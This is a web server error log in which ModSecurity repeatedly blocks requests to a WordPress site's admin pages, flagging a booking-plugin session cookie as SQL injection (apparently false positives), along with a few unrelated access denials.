[Mon May 11 22:24:33.531404 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7AXo_DFxNSZVmaX3PIwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:34.094590 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7AXo_DFxNSZVmaX3PIwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:34.330913 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Ano_DFxNSZVmaX3PJQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:34.331284 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Ano_DFxNSZVmaX3PJQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:34.704890 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Ano_DFxNSZVmaX3PJQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:35.349676 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7A3o_DFxNSZVmaX3PJgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:35.350093 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7A3o_DFxNSZVmaX3PJgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:35.933045 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7A3o_DFxNSZVmaX3PJgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:38.646874 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Bno_DFxNSZVmaX3PKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:38.647291 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Bno_DFxNSZVmaX3PKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:40.843143 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Bno_DFxNSZVmaX3PKAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:41.634237 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7CXo_DFxNSZVmaX3PLgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:41.634523 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7CXo_DFxNSZVmaX3PLgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:42.220772 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7CXo_DFxNSZVmaX3PLgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:43.350132 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7C3o_DFxNSZVmaX3PMQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:43.350447 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7C3o_DFxNSZVmaX3PMQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:43.893919 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7C3o_DFxNSZVmaX3PMQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:44.551662 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7DHo_DFxNSZVmaX3PMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:44.551950 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7DHo_DFxNSZVmaX3PMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:46.668085 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7DHo_DFxNSZVmaX3PMwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:47.024391 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7D3o_DFxNSZVmaX3PNQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:47.024730 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7D3o_DFxNSZVmaX3PNQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:47.636345 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7D3o_DFxNSZVmaX3PNQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:49.823341 2026] [autoindex:error] [pid 1588898:tid 1588900] [client 18.199.144.47:60724] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:24:49.943678 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7EXo_DFxNSZVmaX3POAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:49.943971 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7EXo_DFxNSZVmaX3POAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:50.553450 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7EXo_DFxNSZVmaX3POAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:51.148850 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7E3o_DFxNSZVmaX3POgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:51.149137 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7E3o_DFxNSZVmaX3POgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:51.724804 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7E3o_DFxNSZVmaX3POgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:52.151981 2026] [authz_core:error] [pid 1605480:tid 1605528] [client 216.73.216.110:17759] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Twig/error_log
[Mon May 11 22:24:52.449407 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7FHo_DFxNSZVmaX3PPAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:52.449702 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7FHo_DFxNSZVmaX3PPAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:53.631558 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7FHo_DFxNSZVmaX3PPAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:53.846234 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7FXo_DFxNSZVmaX3PPgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:53.846516 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7FXo_DFxNSZVmaX3PPgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:54.385218 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7FXo_DFxNSZVmaX3PPgAAANA"], referer: https://rentparadise.fr/wp-login.php
